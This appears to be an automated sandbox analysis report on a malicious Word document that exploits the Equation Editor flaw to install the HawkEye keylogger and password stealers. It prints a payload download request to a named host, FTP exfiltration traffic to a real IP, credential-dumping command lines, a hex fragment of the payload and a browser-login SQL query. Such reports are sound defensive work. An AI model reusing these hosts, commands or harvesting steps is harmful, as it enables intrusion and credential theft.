Loading ...

Play interactive tourEdit tour

Windows Analysis Report 280072109764552.doc

Overview

General Information

Sample Name:280072109764552.doc
Analysis ID:455555
MD5:ae01f0cc63c8a3b7bb239976c56788c3
SHA1:cd86bb62ab645cab4d20ec8a931ca9e84801ea36
SHA256:fde845dc869db03ce766a34d4d325cfb60ea5e605244e823fcfea5b3135aacb7
Tags:doc
Infos:

Most interesting Screenshot:

Detection

HawkEye MailPassView
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected HawkEye Rat
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AntiVM3
Yara detected HawkEye Keylogger
Yara detected MailPassView
.NET source code contains potential unpacker
.NET source code contains very large array initializations
.NET source code references suspicious native API functions
Allocates memory in foreign processes
Changes the view of files in windows explorer (hidden files and folders)
Contains functionality to log keystrokes (.Net Source)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sample uses process hollowing technique
Searches for Windows Mail specific files
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file access)
Tries to steal Mail credentials (via file registry)
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May infect USB drives
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses FTP
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara signature match

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 2700 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • EQNEDT32.EXE (PID: 2376 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • name.exe (PID: 1776 cmdline: 'C:\Users\user\AppData\Roaming\name.exe' MD5: FA0A3ED04EEC65D6D3FB55AA7D2497C1)
      • InstallUtil.exe (PID: 2964 cmdline: C:\Users\user\AppData\Local\Temp\InstallUtil.exe MD5: BB85AA6D90A4157ED799257072B265FF)
        • vbc.exe (PID: 944 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt' MD5: 1672D0478049ABDAF0197BE64A7F867F)
        • vbc.exe (PID: 2460 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt' MD5: 1672D0478049ABDAF0197BE64A7F867F)
  • cleanup

Malware Configuration

Threatname: HawkEye

{"Modules": ["WebBrowserPassView", "mailpv", "Mail PassView"], "Version": ""}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.2363878816.00000000004E0000.00000004.00000001.sdmpHKTL_NET_GUID_StealerDetects c# red/black-team tools via typelibguidArnim Rupp
  • 0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
00000005.00000002.2363914554.00000000005E0000.00000004.00000001.sdmpHKTL_NET_GUID_StealerDetects c# red/black-team tools via typelibguidArnim Rupp
  • 0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
00000007.00000002.2179402637.0000000000400000.00000040.00000001.sdmpJoeSecurity_WebBrowserPassViewYara detected WebBrowserPassView password recovery toolJoe Security
    00000006.00000002.2176599122.0000000000400000.00000040.00000001.sdmpJoeSecurity_MailPassViewYara detected MailPassViewJoe Security
      00000005.00000002.2363789535.0000000000402000.00000040.00000001.sdmpRAT_HawkEyeDetects HawkEye RATKevin Breen <kevin@techanarchy.net>
      • 0x7b697:$key: HawkEyeKeylogger
      • 0x7d895:$salt: 099u787978786
      • 0x7bcb0:$string1: HawkEye_Keylogger
      • 0x7cb03:$string1: HawkEye_Keylogger
      • 0x7d7f5:$string1: HawkEye_Keylogger
      • 0x7c099:$string2: holdermail.txt
      • 0x7c0b9:$string2: holdermail.txt
      • 0x7bfdb:$string3: wallet.dat
      • 0x7bff3:$string3: wallet.dat
      • 0x7c009:$string3: wallet.dat
      • 0x7d3d7:$string4: Keylog Records
      • 0x7d6ef:$string4: Keylog Records
      • 0x7d8ed:$string5: do not script -->
      • 0x7b67f:$string6: \pidloc.txt
      • 0x7b6e5:$string7: BSPLIT
      • 0x7b6f5:$string7: BSPLIT
      Click to see the 28 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      5.2.InstallUtil.exe.5e0000.5.raw.unpackHKTL_NET_GUID_StealerDetects c# red/black-team tools via typelibguidArnim Rupp
      • 0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
      5.2.InstallUtil.exe.36594d0.12.unpackJoeSecurity_MailPassViewYara detected MailPassViewJoe Security
        4.2.name.exe.368a90f.10.unpackJoeSecurity_WebBrowserPassViewYara detected WebBrowserPassView password recovery toolJoe Security
          5.2.InstallUtil.exe.36716f0.11.raw.unpackJoeSecurity_WebBrowserPassViewYara detected WebBrowserPassView password recovery toolJoe Security
            4.2.name.exe.349032a.9.raw.unpackRAT_HawkEyeDetects HawkEye RATKevin Breen <kevin@techanarchy.net>
            • 0x7548f:$key: HawkEyeKeylogger
            • 0x7768d:$salt: 099u787978786
            • 0x75aa8:$string1: HawkEye_Keylogger
            • 0x768fb:$string1: HawkEye_Keylogger
            • 0x775ed:$string1: HawkEye_Keylogger
            • 0x75e91:$string2: holdermail.txt
            • 0x75eb1:$string2: holdermail.txt
            • 0x75dd3:$string3: wallet.dat
            • 0x75deb:$string3: wallet.dat
            • 0x75e01:$string3: wallet.dat
            • 0x771cf:$string4: Keylog Records
            • 0x774e7:$string4: Keylog Records
            • 0x776e5:$string5: do not script -->
            • 0x75477:$string6: \pidloc.txt
            • 0x754dd:$string7: BSPLIT
            • 0x754ed:$string7: BSPLIT
            Click to see the 83 entries

            Sigma Overview

            Exploits:

            barindex
            Sigma detected: EQNEDT32.EXE connecting to internetShow sources
            Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 103.255.237.180, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2376, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
            Sigma detected: File Dropped By EQNEDT32EXEShow sources
            Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2376, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\09867654270721.PDF[1].exe

            System Summary:

            barindex
            Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
            Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\user\AppData\Roaming\name.exe' , CommandLine: 'C:\Users\user\AppData\Roaming\name.exe' , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\name.exe, NewProcessName: C:\Users\user\AppData\Roaming\name.exe, OriginalFileName: C:\Users\user\AppData\Roaming\name.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2376, ProcessCommandLine: 'C:\Users\user\AppData\Roaming\name.exe' , ProcessId: 1776
            Sigma detected: Possible Applocker BypassShow sources
            Source: Process startedAuthor: juju4: Data: Command: C:\Users\user\AppData\Local\Temp\InstallUtil.exe, CommandLine: C:\Users\user\AppData\Local\Temp\InstallUtil.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\InstallUtil.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\InstallUtil.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\InstallUtil.exe, ParentCommandLine: 'C:\Users\user\AppData\Roaming\name.exe' , ParentImage: C:\Users\user\AppData\Roaming\name.exe, ParentProcessId: 1776, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\InstallUtil.exe, ProcessId: 2964

            Jbx Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Antivirus / Scanner detection for submitted sampleShow sources
            Source: 280072109764552.docAvira: detected
            Found malware configurationShow sources
            Source: name.exe.1776.4.memstrMalware Configuration Extractor: HawkEye {"Modules": ["WebBrowserPassView", "mailpv", "Mail PassView"], "Version": ""}
            Multi AV Scanner detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\09867654270721.PDF[1].exeReversingLabs: Detection: 13%
            Source: C:\Users\user\AppData\Roaming\name.exeReversingLabs: Detection: 13%
            Multi AV Scanner detection for submitted fileShow sources
            Source: 280072109764552.docReversingLabs: Detection: 31%
            Machine Learning detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Roaming\name.exeJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\09867654270721.PDF[1].exeJoe Sandbox ML: detected
            Source: 5.2.InstallUtil.exe.400000.0.unpackAvira: Label: TR/AD.MExecute.lzrac
            Source: 5.2.InstallUtil.exe.400000.0.unpackAvira: Label: SPR/Tool.MailPassView.473
            Source: 4.2.name.exe.3682b02.11.unpackAvira: Label: TR/Inject.vcoldi
            Source: 4.2.name.exe.3489f22.7.unpackAvira: Label: TR/Inject.vcoldi

            Exploits:

            barindex
            Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\name.exe
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\name.exe
            Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
            Source: unknownHTTPS traffic detected: 142.250.203.100:443 -> 192.168.2.22:49168 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 192.168.2.22:49168 -> 142.250.203.100:443 version: TLS 1.0
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
            Source: Binary string: C:\Users\Jovan\Documents\Visual Studio 2010\Projects\Stealer\CMemoryExecute\CMemoryExecute\obj\Release\CMemoryExecute.pdb source: name.exe, 00000004.00000002.2147894445.0000000003600000.00000004.00000001.sdmp, InstallUtil.exe, 00000005.00000002.2363878816.00000000004E0000.00000004.00000001.sdmp
            Source: Binary string: f:\Projects\VS2005\mailpv\Release\mailpv.pdb source: name.exe, 00000004.00000002.2147894445.0000000003600000.00000004.00000001.sdmp, InstallUtil.exe, 00000005.00000002.2366372059.0000000003651000.00000004.00000001.sdmp, vbc.exe
            Source: Binary string: f:\Projects\VS2005\WebBrowserPassView\Release\WebBrowserPassView.pdb source: name.exe, 00000004.00000002.2147894445.0000000003600000.00000004.00000001.sdmp, InstallUtil.exe, 00000005.00000002.2366372059.0000000003651000.00000004.00000001.sdmp, vbc.exe
            Source: Binary string: InstallUtil.pdb source: name.exe, 00000004.00000002.2153168728.0000000006870000.00000004.00000001.sdmp, InstallUtil.exe
            Source: name.exe, 00000004.00000002.2147894445.0000000003600000.00000004.00000001.sdmpBinary or memory string: autorun.inf
            Source: name.exe, 00000004.00000002.2147894445.0000000003600000.00000004.00000001.sdmpBinary or memory string: [autorun]
            Source: InstallUtil.exe, 00000005.00000002.2363789535.0000000000402000.00000040.00000001.sdmpBinary or memory string: autorun.inf
            Source: InstallUtil.exe, 00000005.00000002.2363789535.0000000000402000.00000040.00000001.sdmpBinary or memory string: [autorun]
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 6_2_00406EC3 FindFirstFileA,FindNextFileA,strlen,strlen,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_00408441 FindFirstFileW,FindNextFileW,wcslen,wcslen,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 7_2_00407E0E FindFirstFileW,FindNextFileW,FindClose,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\
            Source: C:\Users\user\AppData\Roaming\name.exeCode function: 4x nop then jmp 00349438h
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeCode function: 4x nop then call 001A2300h
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeCode function: 4x nop then call 001A2300h
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeCode function: 4x nop then jmp 001A2248h
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeCode function: 4x nop then call 001A2300h
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]
            Source: C:\Users\user\AppData\Local\Temp\InstallUtil.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]
            Source: global trafficDNS query: name: vecvietnam.com.vn
            Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.250.203.100:443
            Source: global trafficTCP traffic: 192.168.2.22:49167 -> 103.255.237.180:80

            Networking:

            barindex
            Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
            Source: TrafficSnort IDS: 2020410 ET TROJAN HawkEye Keylogger FTP 192.168.2.22:49171 -> 45.141.152.18:21
            Source: global trafficTCP traffic: 192.168.2.22:49172 -> 45.141.152.18:64943
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: ApacheDate: Wed, 28 Jul 2021 15:01:16 GMTContent-Type: application/octet-streamContent-Length: 1383936Last-Modified: Wed, 28 Jul 2021 00:30:49 GMTConnection: keep-aliveETag: "6100a539-151e00"Expires: Fri, 27 Aug 2021 15:01:16 GMTCache-Control: max-age=2592000Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 c7 80 a0 3c 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 0a 15 00 00 12 00 00 00 00 00 00 ce 29 15 00 00 20 00 00 00 40 15 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 15 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 7c 29 15 00 4f 00 00 00 00 40 15 00 84 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 15 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d4 09 15 00 00 20 00 00 00 0a 15 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 84 0e 00 00 00 40 15 00 00 10 00 00 00 0c 15 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 15 00 00 02 00 00 00 1c 15 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 29 15 00 00 00 00 00 48 00 00 00 02 00 05 00 cc 31 14 00 b0 f7 00 00 03 00 02 00 ec 00 00 06 d0 8b 03 00 fa a5 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9c 4a ec 6a f8 97 e3 ec dd a8 de 31 58 b3 92 bf 6e 7d d6 d1 7c 1a 30 16 5f fe 66 6f 61 b5 17 5e 25 4d d0 96 03 24 43 31 ca 10 70 05 87 34 b9 93 18 8f b3 a1 c5 5d da 81 19 d5 0a f9 30 73 8b 28 90 7f 0c 0b e2 fa bc 49 3a a5 07 6c a8 2a 8e 2b 44 d2 57 d0 01 75 97 c7 71 4e 7c 2c 19 49 00 56 83 48 74 07 27 ae b0 1d d2 6a 67 20 55 6d d7 ed 46 de b4 5d 1c b9 26 1a e6 44 98 93 7d 8f 2f ef a4 b0 e8 60 b5 87 03 95 21 39 fc 96 0e 77 71 04 76 8d e4 3a 94 a1 39 c9 21 59 1f e2 16 1d 9e 43 3a 76 7a a4 84 76 38 be da 1e 3c e1 bc 8f 0c 6f d1 93 1d ee a9 f4 5b 03 76 1e 3f 5b 67 20 7f 04 9a b9 5c 96 fb cb 7e fe 55 26 5e 75 65 57 0d 90 4c ae 10 81 00 af 99 44 1a 77 2e 65 37 dc 56 ba 9e 37 47 02 33 74 72 05 15 1d 99 83 95 e5 9c 1f 11 ad 0e b7 0f fd 04 ea 20 17 7c 84 9d 19 c6 78 ce a3 d5 2d 0f 0a 5d d7 3c 0a 6b e1 15 15 ae 34 d9 0f 53 88 cd 9e ab a0 33 5c e1 1c f7 ed 67 fb 55 21 b4 f1 0f 6f 0f 07 50
            Source: Joe Sandbox ViewIP Address: 45.141.152.18 45.141.152.18
            Source: Joe Sandbox ViewIP Address: 45.141.152.18 45.141.152.18
            Source: Joe Sandbox ViewASN Name: VNPT-AS-VNVNPTCorpVN VNPT-AS-VNVNPTCorpVN
            Source: Joe Sandbox ViewASN Name: M247GB M247GB
            Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
            Source: unknownFTP traffic detected: 45.141.152.18:21 -> 192.168.2.22:49171 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 11:02. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 11:02. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 11:02. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 11:02. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
            Source: global trafficHTTP traffic detected: GET /xpen3/09867654270721.PDF.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: vecvietnam.com.vnConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 142.250.203.100:443 -> 192.168.2.22:49168 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 192.168.2.22:49168 -> 142.250.203.100:443 version: TLS 1.0
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{238E66D8-299E-4B99-A605-44EE5B79BCDD}.tmpJump to behavior
            Source: global trafficHTTP traffic detected: GET /xpen3/09867654270721.PDF.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: vecvietnam.com.vnConnection: Keep-Alive
            Source: name.exe, 00000004.00000002.2147894445.0000000003600000.00000004.00000001.sdmp, InstallUtil.exe, 00000005.00000002.2366372059.0000000003651000.00000004.00000001.sdmpString found in binary or memory: @nss3.dllSOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe%programfiles%\Sea MonkeySOFTWARE\Mozillamozilla%s\binPathToExe%programfiles%\Mozilla FirefoxSELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins.---signons.txtsignons2.txtsignons3.txtsignons.sqlitenetmsg.dllUnknown Error\Error %d: %seditkernel32.dll... open %2.2X %s (%s)Microsoft_WinInetMicrosoft_WinInet_u7@dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
            Source: name.exe, 00000004.00000002.2147894445.0000000003600000.00000004.00000001.sdmp, InstallUtil.exe, 00000005.00000002.2366372059.0000000003651000.00000004.00000001.sdmpString found in binary or memory: @nss3.dllSOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe%programfiles%\Sea MonkeySOFTWARE\Mozillamozilla%s\binPathToExe%programfiles%\Mozilla FirefoxSELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins.---signons.txtsignons2.txtsignons3.txtsignons.sqlitenetmsg.dllUnknown Error\Error %d: %seditkernel32.dll... open %2.2X %s (%s)Microsoft_WinInetMicrosoft_WinInet_u7@dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
            Source: vbc.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
            Source: name.exe, 00000004.00000002.2141588821.0000000000AE6000.00000004.00000020.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
            Source: unknownDNS traffic detected: queries for: vecvietnam.com.vn
            Source: name.exe, 00000004.00000002.2147894445.0000000003600000.00000004.00000001.sdmp, InstallUtil.exe, 00000005.00000002.2366372059.0000000003651000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
            Source: name.exe, 00000004.00000002.2141588821.0000000000AE6000.00000004.00000020.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
            Source: name.exe, 00000004.00000002.2141588821.0000000000AE6000.00000004.00000020.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
            Source: name.exe, 00000004.00000002.2141588821.0000000000AE6000.00000004.00000020.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
            Source: name.exe, 00000004.00000002.2141473000.0000000000A7C000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: name.exe, 00000004.00000002.2141568626.0000000000ADE000.00000004.00000020.sdmpString found in binary or memory: http://crl.pki.goog/GTS1O1core.crl0
            Source: name.exe, 00000004.00000002.2141568626.0000000000ADE000.00000004.00000020.sdmpString found in binary or memory: http://crl.pki.goog/gsr2/gsr2.crl0?
            Source: name.exe, 00000004.00000002.2141588821.0000000000AE6000.00000004.00000020.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
            Source: name.exe, 00000004.00000002.2141588821.0000000000AE6000.00000004.00000020.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
            Source: InstallUtil.exe, 00000005.00000002.2366070064.0000000002AC6000.00000004.00000001.sdmpString found in binary or memory: http://ftp.vngpack.com
            Source: name.exe, 00000004.00000003.2130025083.000000000510A000.00000004.00000001.sdmpString found in binary or memory: http://n.f
            Source: name.exe, 00000004.00000003.2130025083.000000000510A000.00000004.00000001.sdmp, name.exe, 00000004.00000002.2150294891.0000000005113000.00000004.00000001.sdmpString found in binary or memory: http://ns.adobe.c/s
            Source: name.exe, 00000004.00000003.2130025083.000000000510A000.00000004.00000001.sdmpString found in binary or memory: http://ns.adobede
            Source: name.exe, 00000004.00000003.2130025083.000000000510A000.00000004.00000001.sdmpString found in binary or memory: http://ns.ao
